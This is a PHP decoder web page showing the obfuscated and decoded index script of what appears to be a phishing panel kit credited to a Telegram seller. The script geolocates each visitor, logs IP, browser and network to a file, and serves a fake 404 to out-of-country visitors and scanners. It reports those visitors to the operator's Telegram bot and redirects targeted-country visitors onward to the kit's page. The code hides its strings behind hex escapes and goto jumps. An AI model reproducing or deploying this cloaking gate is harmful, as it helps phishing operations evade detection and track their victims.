Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php include 'anti/captcha.php'; // include 'anti/antibot.php'; include 'config/panel...

Decoded Output download

<?php 
include 'anti/captcha.php'; 
// include 'anti/antibot.php'; 
include 'config/panel.php'; 
 
  
// Made by @Vssrtje - https://t.me/VssrtjePanels 
// 30-12-24 - #Free B 
 
 
 
 
// You can edit the config in /config/panel.php. 
 
 
  
 goto HWgDh; hd9RR: $shortenedAgent = $browser . "/" . $version . " (" . $platform . ")"; goto Td63Y; P3Fof: $userAgent = $_SERVER["HTTP_USER_AGENT"]; goto WIeDu; Oqdkw: $org = $ipData["as"] ?? "unknown"; goto p6xiS; GaXEW: if ($ipData && $ipData["status"] === "success") { $visitorCountry = $ipData["country"]; if ($visitorCountry !== $allowedCountry) { $message = "<b>[\xf0\237\232\xa8] Detected a bot on the index page.</b>
\xa" . "\xf0\x9f\223\x8d <b>IP:</b> <code>{$visitorIp}</code>
" . "\360\x9f\x8c\x8d <b>Country:</b> <b>{$visitorCountry}</b>
" . "\360\237\x93\261 <b>Device:</b> <i>{$simplifiedUserAgent}</i>"; $inlineKeyboard = array("inline_keyboard" => array(array(array("text" => "\xf0\237\232\253 Ban IP", "url" => "{$baseUrl}/manage/vis-is-cooked.php?dm-banbot={$visitorIp}")))); notiEruit($telegramBotToken, $telegramChatId, $message, $inlineKeyboard); } if ($visitorCountry !== $allowedCountry) { die("404 page not found."); } else { header("Location: /view/im.php"); die; } } else { die("404 page not found."); } goto yRLuf; uMrL2: $ipApiResponse = file_get_contents("http://ip-api.com/json/" . $visitorIp); goto nGjtO; pUFyR: file_put_contents("./visitors.php", $str, FILE_APPEND | LOCK_EX); goto g1CXg; KKO4Y: function notiEruit($botToken, $chatId, $message, $inlineKeyboard = null) { $url = "https://api.telegram.org/bot{$botToken}/sendMessage"; $data = array("chat_id" => $chatId, "text" => $message, "parse_mode" => "HTML"); if ($inlineKeyboard) { $data["reply_markup"] = json_encode($inlineKeyboard); } $options = array("http" => array("header" => "Content-Type: application/x-www-form-urlencoded\xd\xa", "method" => "POST", "content" => http_build_query($data))); $context = stream_context_create($options); return file_get_contents($url, false, $context); } goto L17wt; L17wt: function shiVlag($countryCode) { $offset = 127397; $flag = ''; foreach (str_split(strtoupper($countryCode)) as $char) { $flag .= mb_convert_encoding("&#" . (ord($char) + $offset) . ";", "UTF-8", "HTML-ENTITIES"); } return $flag; } goto XMNN9; uz_fk: $status = $ipData["status"] ?? "unknown"; goto zE_Wg; Td63Y: $str = "<tr><td style="color: white;">{$flagEmoji}</td><td style="color: white;">{$visitorIp}</td><td style="color: white;">{$shortenedAgent}</td><td style="color: white;">{$date}</td><td style="color: white;">{$org}</td></tr>"; goto pUFyR; XMNN9: $visitorIp = $_SERVER["REMOTE_ADDR"]; goto P3Fof; ZZWEq: $date = date("Y-m-d H:i:s"); goto l9fmm; mLuhj: $simplifiedUserAgent = substr($simplifiedUserAgent, 0, 50); goto uMrL2; ConLI: if (preg_match("/(chrome|firefox|safari|edge|opera|msie|trident|brave|vivaldi|duckduckgo|ucbrowser|yandex)\/?([\d\.]+)/i", $userAgent, $matches)) { $browser = ucfirst(strtolower($matches[1])); $version = explode(".", $matches[2])[0]; } else { $browser = "Unknown"; $version = ''; } goto xOVqO; p6xiS: date_default_timezone_set("Europe/Amsterdam"); goto ZZWEq; HWgDh: function getIpInfo($ip = '') { $ipinfo = file_get_contents("http://ip-api.com/json/" . $ip); $ipinfo_json = json_decode($ipinfo, true); return $ipinfo_json; } goto UWB8V; g1CXg: if (CookieMonster($visitorIp, $RestInPiss)) { header("Location: {$GaEraf}"); die; } goto GaXEW; xOVqO: if (preg_match("/(Win64|Windows|Macintosh|Linux|Android|iPhone|iPad|iPod|Ubuntu|Fedora|Debian|Chrome OS|iOS|macOS|BlackBerry|BB10|Windows Phone|webOS|Kindle|Pixel)/i", $userAgent, $platformMatch)) { $platform = $platformMatch[1]; } else { $platform = "Unknown"; } goto hd9RR; zE_Wg: $CountryCode = $ipData["countryCode"] ?? "unknown"; goto Oqdkw; WIeDu: $simplifiedUserAgent = preg_replace("/[^a-zA-Z0-9\/\.\s]/", '', $userAgent); goto mLuhj; nGjtO: $ipData = json_decode($ipApiResponse, true); goto uz_fk; UWB8V: function CookieMonster($ip, $RestInPiss) { $bannedIps = file($RestInPiss, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); return in_array($ip, $bannedIps); } goto KKO4Y; l9fmm: $flagEmoji = shiVlag($CountryCode); goto ConLI; yRLuf: ?>

Did this file decode correctly?

Original Code

<?php
include 'anti/captcha.php';
// include 'anti/antibot.php';
include 'config/panel.php';

 
// Made by @Vssrtje - https://t.me/VssrtjePanels
// 30-12-24 - #Free B




// You can edit the config in /config/panel.php.


 
 goto HWgDh; hd9RR: $shortenedAgent = $browser . "\57" . $version . "\40\50" . $platform . "\51"; goto Td63Y; P3Fof: $userAgent = $_SERVER["\110\x54\x54\120\x5f\x55\123\x45\122\137\x41\x47\x45\116\x54"]; goto WIeDu; Oqdkw: $org = $ipData["\x61\163"] ?? "\165\156\153\156\x6f\x77\x6e"; goto p6xiS; GaXEW: if ($ipData && $ipData["\163\x74\141\164\165\163"] === "\x73\x75\x63\143\x65\x73\x73") { $visitorCountry = $ipData["\x63\157\165\156\x74\x72\171"]; if ($visitorCountry !== $allowedCountry) { $message = "\x3c\x62\76\x5b\xf0\237\232\xa8\135\40\104\145\x74\x65\143\164\145\144\40\141\40\x62\157\164\x20\x6f\156\40\x74\x68\x65\40\151\x6e\144\x65\170\40\x70\141\x67\145\x2e\x3c\x2f\142\x3e\12\xa" . "\xf0\x9f\223\x8d\40\74\x62\x3e\x49\120\x3a\x3c\57\x62\x3e\x20\x3c\143\157\144\x65\76{$visitorIp}\x3c\57\143\157\144\x65\76\12" . "\360\x9f\x8c\x8d\x20\74\x62\x3e\103\157\165\156\164\162\x79\x3a\x3c\x2f\142\76\40\x3c\x62\76{$visitorCountry}\74\x2f\x62\x3e\12" . "\360\237\x93\261\x20\74\x62\76\x44\x65\x76\x69\143\x65\72\x3c\x2f\142\x3e\40\74\151\x3e{$simplifiedUserAgent}\x3c\57\x69\76"; $inlineKeyboard = array("\x69\x6e\154\151\x6e\145\137\x6b\x65\171\x62\x6f\x61\162\144" => array(array(array("\x74\x65\x78\x74" => "\xf0\237\232\253\x20\x42\141\x6e\x20\111\120", "\165\x72\154" => "{$baseUrl}\x2f\x6d\x61\x6e\141\x67\x65\x2f\x76\151\163\55\x69\x73\x2d\x63\x6f\157\x6b\145\x64\x2e\x70\150\x70\x3f\144\155\x2d\142\x61\156\x62\157\164\75{$visitorIp}")))); notiEruit($telegramBotToken, $telegramChatId, $message, $inlineKeyboard); } if ($visitorCountry !== $allowedCountry) { die("\x34\60\64\40\160\x61\147\x65\x20\x6e\157\x74\40\146\157\165\156\x64\x2e"); } else { header("\114\x6f\x63\x61\164\151\157\156\x3a\40\57\x76\151\145\x77\57\151\155\56\160\x68\x70"); die; } } else { die("\x34\60\x34\x20\160\141\147\145\40\x6e\x6f\x74\40\x66\x6f\165\x6e\x64\56"); } goto yRLuf; uMrL2: $ipApiResponse = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\151\x70\55\x61\x70\151\x2e\x63\157\155\x2f\x6a\163\x6f\156\57" . $visitorIp); goto nGjtO; pUFyR: file_put_contents("\x2e\x2f\x76\151\x73\151\x74\157\x72\163\56\160\150\160", $str, FILE_APPEND | LOCK_EX); goto g1CXg; KKO4Y: function notiEruit($botToken, $chatId, $message, $inlineKeyboard = null) { $url = "\150\x74\x74\x70\163\x3a\57\x2f\141\160\151\x2e\x74\145\154\145\x67\162\141\155\56\x6f\162\x67\x2f\142\157\x74{$botToken}\x2f\163\145\x6e\x64\115\x65\x73\x73\141\147\145"; $data = array("\x63\150\x61\x74\137\151\144" => $chatId, "\164\145\170\164" => $message, "\x70\141\x72\163\x65\137\155\x6f\144\145" => "\x48\x54\x4d\114"); if ($inlineKeyboard) { $data["\162\145\x70\154\x79\137\155\141\x72\x6b\x75\x70"] = json_encode($inlineKeyboard); } $options = array("\150\164\x74\x70" => array("\150\145\x61\x64\x65\x72" => "\103\157\x6e\164\145\x6e\x74\x2d\x54\171\160\x65\72\40\141\x70\x70\154\x69\143\141\164\151\157\156\x2f\170\x2d\167\167\167\55\146\x6f\162\x6d\55\165\x72\154\x65\x6e\x63\157\144\x65\144\xd\xa", "\x6d\145\164\150\157\x64" => "\120\117\123\124", "\x63\157\156\x74\x65\x6e\164" => http_build_query($data))); $context = stream_context_create($options); return file_get_contents($url, false, $context); } goto L17wt; L17wt: function shiVlag($countryCode) { $offset = 127397; $flag = ''; foreach (str_split(strtoupper($countryCode)) as $char) { $flag .= mb_convert_encoding("\x26\43" . (ord($char) + $offset) . "\73", "\x55\124\x46\x2d\70", "\110\x54\x4d\x4c\x2d\105\x4e\x54\x49\x54\111\x45\123"); } return $flag; } goto XMNN9; uz_fk: $status = $ipData["\x73\x74\141\164\165\x73"] ?? "\165\x6e\153\156\157\x77\x6e"; goto zE_Wg; Td63Y: $str = "\x3c\164\162\76\x3c\164\144\40\163\x74\171\x6c\145\x3d\x22\143\157\x6c\157\162\x3a\x20\x77\x68\151\x74\145\73\42\76{$flagEmoji}\74\57\x74\144\76\74\164\x64\x20\163\x74\171\154\145\x3d\x22\x63\x6f\154\x6f\162\x3a\40\x77\x68\151\164\x65\x3b\42\x3e{$visitorIp}\74\57\x74\x64\76\74\164\x64\40\x73\x74\x79\154\x65\75\x22\x63\x6f\154\x6f\x72\x3a\x20\167\150\151\164\x65\73\x22\76{$shortenedAgent}\x3c\x2f\x74\x64\x3e\74\164\144\x20\x73\x74\171\154\145\75\42\143\157\154\157\x72\72\40\167\x68\x69\164\x65\x3b\42\x3e{$date}\x3c\x2f\x74\x64\76\74\164\x64\x20\163\x74\x79\154\x65\x3d\x22\143\157\x6c\x6f\162\x3a\x20\x77\x68\151\164\x65\x3b\x22\x3e{$org}\x3c\57\x74\144\76\74\x2f\164\162\76"; goto pUFyR; XMNN9: $visitorIp = $_SERVER["\122\105\x4d\117\x54\x45\x5f\101\x44\104\x52"]; goto P3Fof; ZZWEq: $date = date("\x59\55\x6d\x2d\144\x20\110\72\x69\72\163"); goto l9fmm; mLuhj: $simplifiedUserAgent = substr($simplifiedUserAgent, 0, 50); goto uMrL2; ConLI: if (preg_match("\x2f\x28\x63\x68\162\x6f\155\145\x7c\146\151\162\x65\x66\157\x78\x7c\x73\x61\x66\x61\x72\151\174\x65\144\x67\x65\x7c\x6f\160\x65\x72\x61\174\155\x73\151\x65\x7c\x74\x72\151\144\x65\x6e\164\x7c\x62\x72\x61\166\145\174\166\151\166\141\x6c\144\x69\x7c\144\165\x63\x6b\x64\x75\143\153\147\157\174\x75\x63\142\x72\x6f\167\x73\x65\162\174\171\x61\x6e\x64\145\170\51\134\x2f\77\50\x5b\x5c\144\134\x2e\135\53\51\x2f\151", $userAgent, $matches)) { $browser = ucfirst(strtolower($matches[1])); $version = explode("\56", $matches[2])[0]; } else { $browser = "\x55\x6e\153\x6e\157\x77\156"; $version = ''; } goto xOVqO; p6xiS: date_default_timezone_set("\x45\x75\162\157\x70\x65\57\x41\155\163\x74\145\162\144\141\155"); goto ZZWEq; HWgDh: function getIpInfo($ip = '') { $ipinfo = file_get_contents("\x68\x74\x74\x70\x3a\x2f\x2f\x69\160\55\141\160\x69\x2e\x63\x6f\x6d\x2f\152\163\157\156\57" . $ip); $ipinfo_json = json_decode($ipinfo, true); return $ipinfo_json; } goto UWB8V; g1CXg: if (CookieMonster($visitorIp, $RestInPiss)) { header("\x4c\157\143\x61\x74\151\157\x6e\72\x20{$GaEraf}"); die; } goto GaXEW; xOVqO: if (preg_match("\57\x28\127\x69\156\x36\x34\x7c\x57\x69\x6e\x64\157\167\x73\x7c\x4d\141\143\x69\x6e\x74\157\163\150\x7c\x4c\151\156\165\170\174\101\x6e\x64\x72\157\x69\144\174\151\120\x68\157\x6e\x65\174\x69\120\x61\144\x7c\151\x50\157\x64\x7c\x55\142\x75\x6e\x74\165\174\x46\x65\144\157\162\x61\174\104\145\142\151\141\156\x7c\103\150\x72\x6f\x6d\145\40\117\123\x7c\x69\117\123\174\155\141\143\117\x53\x7c\102\154\141\143\x6b\102\145\x72\x72\x79\x7c\102\x42\61\60\174\127\151\x6e\144\x6f\x77\163\x20\x50\x68\157\x6e\x65\174\x77\145\142\117\x53\174\x4b\x69\156\144\154\145\x7c\120\x69\x78\x65\154\51\57\151", $userAgent, $platformMatch)) { $platform = $platformMatch[1]; } else { $platform = "\125\156\153\156\157\x77\156"; } goto hd9RR; zE_Wg: $CountryCode = $ipData["\x63\x6f\x75\156\164\x72\171\103\x6f\x64\145"] ?? "\x75\x6e\x6b\156\x6f\167\x6e"; goto Oqdkw; WIeDu: $simplifiedUserAgent = preg_replace("\x2f\133\136\x61\55\172\101\x2d\132\60\x2d\x39\134\x2f\134\x2e\x5c\163\x5d\57", '', $userAgent); goto mLuhj; nGjtO: $ipData = json_decode($ipApiResponse, true); goto uz_fk; UWB8V: function CookieMonster($ip, $RestInPiss) { $bannedIps = file($RestInPiss, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); return in_array($ip, $bannedIps); } goto KKO4Y; l9fmm: $flagEmoji = shiVlag($CountryCode); goto ConLI; yRLuf: ?>

Function Calls

None

Variables

None

Stats

MD5 a2ca60e8396333c12fb45c9c84d12cb9
Eval Count 0
Decode Time 88 ms